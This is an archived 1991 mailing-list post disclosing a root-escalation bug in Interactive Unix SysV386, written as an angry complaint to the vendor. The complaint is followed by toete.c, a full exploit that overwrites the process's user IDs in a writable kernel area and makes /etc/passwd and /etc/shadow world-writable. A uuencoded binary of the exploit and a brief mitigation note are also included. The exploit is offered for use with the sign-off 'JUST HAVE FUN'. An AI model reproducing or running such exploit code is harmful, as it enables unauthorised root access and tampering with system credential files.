SECURITY BUG IN INTERACTIVE UNIX SYSV386 (REPOST)

Joern Lubkoll lumpi at dobag.in-berlin.de
Thu Feb 14 20:20:39 AEST 1991 

Because of myself gettings lots of mail about my posting not comeing
through to some sites, here is another repost. Whoever eats this posting
should be aware of being a news-censor !

--------- ORIGINAL POSTING FOLLOWS -----------

It was a long process of thoughts about this, but now, after half
a year of disput with interactive, here it finally is:

--- jl

Hello you at Interactive Systems Coporation !

it seems that your very cute interactive unix System has a nice bug !

EVERYONE you has access to a shell and a compiler or an interactive
System at home (to upload binaries) CAN BECOME ROOT.

It seems that you programmers aren't able to programm the 386 protected
mode correct. It exists the possibillity to write protect segment and
pages... It would be very useful to write protect the internatl data-
structures whicht the system uses to store information about the user.

Offering the ability to write in these segments is just like offering
CIA - Identity cards per mail-order for everyone (SALE $5).

If you don't believe... try the litte program down there and you'll see !

I didn't believe it either but ... see yourself !

I expect bug-fixes immediatly or my money back for the interactive
system...  VERY soon please !

I have had a lot of conversation with 'Intra Unix' in Germany and a
lot of people at 'ico.isc.com' about the problem. They just told
me this being a only a 'feature' not a bug !

Simply said, it is a bug in the coprocessor emulation code, which
will allow system without a co-cpu to be broken, just because some
programmers aren't able to allocate their own buffers :-)

If you have a co-cpu and Release >= 2.2 you may set the kernel tuneable
parameters UAREAUS and UAREARW to 0 to protect yourself.

Dobag does not have this problem, due to it being a 486 System, but
there will be a lot of systems without a co-cpu !

There is only one way to fix this problem: Phone Interactive or your
Distributor and get very angry !

Next follows toete.c, the program to kill any isc system not being
equipped with a co cpu.

--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE

/* If you use Interactive Unix 2.2 uncomment the following line */
/* #define ISC22 */

#include <stdio.h> 
#ifdef ISC22
#include <sys/limits.h>
#include <sys/unistd.h>
#else
#include <limits.h>
#include <unistd.h>
#endif
#include <sys/sysi86.h>
#include <sys/signal.h>
#include <sys/types.h>
#define ushort	unsigned short
#define ulong	unsigned long
#include <sys/fs/s5dir.h>
#include <sys/user.h>

main()
{
  struct user *dumm;

  /*  0xE0000000 is the virtual adress of the ublock for the current
      running programm. */

  dumm = (struct user *) 0xE0000000;
	
  /*  Here we are so kind to change our effective and real user id
      to zero, which means, that we can do whatever we want... */

  dumm-> u_uid = 0;    /* A well programmed system has to give a
			  segmentation oder protection violation
			  error at this line. But don't expect
			  Interactive Unix to do so... */
  dumm-> u_gid = 0;

  dumm-> u_ruid = 0;
  dumm-> u_rgid = 0;
	
  /*  What would be the first thing you want to do if you become root
      on another system ? */

  chmod ("/etc/passwd",(int) 0666);
  chmod ("/etc/shadow",(int) 0666);

  /*  If you don't believe what I say, uncomment the following line: */

/*  execl("/bin/sh","sh","-c","/bin/ls -l /etc/passwd",(char *) 0); */
}

--- END OF toete.c ---

For those, which won't believe, here is a uuencoded version of the
binary 'toete'.

table
 !"#$%&'()*+,-./0123456789:;<=>?
@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_
begin 644 toete
M3 $$ *+Q%"<          !P #P$+ 0  S (  #P"        U    -    "<z
M T  +G1E>'0   #0    T    ,P"  #0                    (    "YDy
M871A    G -  )P#0  \ @  G ,                  $     N8G-S    x
M -@%0 #8!4                            "     +F-O;6UE;G0     w
M          #8!0                    (  ,.0D)"#[ B+[(M%"(U4A1")v
M%9P#0 !2C54,4E#HW____VH Z)    "#Q 3H'    (/$#%#H<P(  &H N $ u
M  ":      < ],.0D)#K2\=%_    ."+1?QFQX#J$     "+1?QFQX#L$   t
M  "+1?QFQX#N$     "+1?QFQX#P$     !HM@$  &B@ T  Z P   "#Q C)s
MPU6+[%#KKY"X#P   )H     !P /@NX!   SP,.0D)!5B^R![(0"  !75K[_r
M____ at WT( '4Q:+0%0 #HP    %F%P(E%"'0)BT4(B@"$P'46@#VP!4   '0&q
M,\!>7\G#QT4(O05  ,8%L 5   !HPP5  (U%@%#H6 $  (/$"/]U"(U%CE#Hp
M20$  (/$"&H C46 4. at 3 0  @\0(A<"+^'P^: ("  "-A7[]__]05^@, 0  o
M@\0,/0("  !U&V@" @  C85^_?__4&BL T  Z+0   "#Q PS]E?H"0   %F+n
MQEY?R<.0D+@&    F@     '  ^"#@$  #/ PY"0D%6+[%=64XM]"(L=G - m
M (7;=24SP%M>7\G#D)#_,X/#!%?H&0   (/$"(7 B_!T"(O&6UY?R<.0 at SL l
M==_KU)!5B^Q75HM]"(MU#.L.D)"0#[X'1ST]    =!P/O@</OA9&.\)TZHH'k
MA,!U% ^^1O\]/0   '4)B\9>7\G#D)"0,\!>7\G#D)!75HM\) R+="00BTPDj
M%(O'B]'!Z0+SI8O*@>$#    \Z1>7\.X!0   )H     !P /@DH   ##D+@#i
M    F@     '  ^"-@   ,.05XO6BWPD##/ N?_____RKO?1BW0D#(M\) B+h
MP<'I O.EB\B!X0,   #SI(M$) B+\E_#D*/4!4  N/_____#D. at 7    BU0Dg
M!+@!    F@     '  ^"V?___\/#D)"0     "]E=&,O<&%S<W=D   @(" @f
M(" @(" H*"@H*" @(" @(" @(" @(" @(" @($@0$! 0$! 0$! 0$! 0$!"$e
MA(2$A(2$A(2$$! 0$! 0$(&!@8&!@0$! 0$! 0$! 0$! 0$! 0$! 0$!$! 0d
M$! 0 at H*"@H*" @(" @(" @(" @(" @(" @(" @(0$! 0(               c
M                                                            b
M                                                            a
M                                       ! @,$!08'" D*"PP-#@\0z
M$1(3%!46%Q at 9&AL<'1X?("$B(R0E)B<H*2HK+"TN+S Q,C,T-38W.#DZ.SP]y
M/C] 86)C9&5F9VAI:FML;6YO<'%R<W1U=G=X>7I;7%U>7V!!0D-$149'2$E*x
M2TQ-3D]045)35%565UA96GM\?7Y_                                w
M                                                            v
M                                                            u
M                      $   !#2%)#3$%34P!A<V-I:0 O;&EB+V-H<F-Lt
+87-S+P          s
 r
end


--- END ---

JUST HAVE FUN !

mfg. JL

-- 
lumpi at dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

More information about the Comp.unix.sysv386 mailing list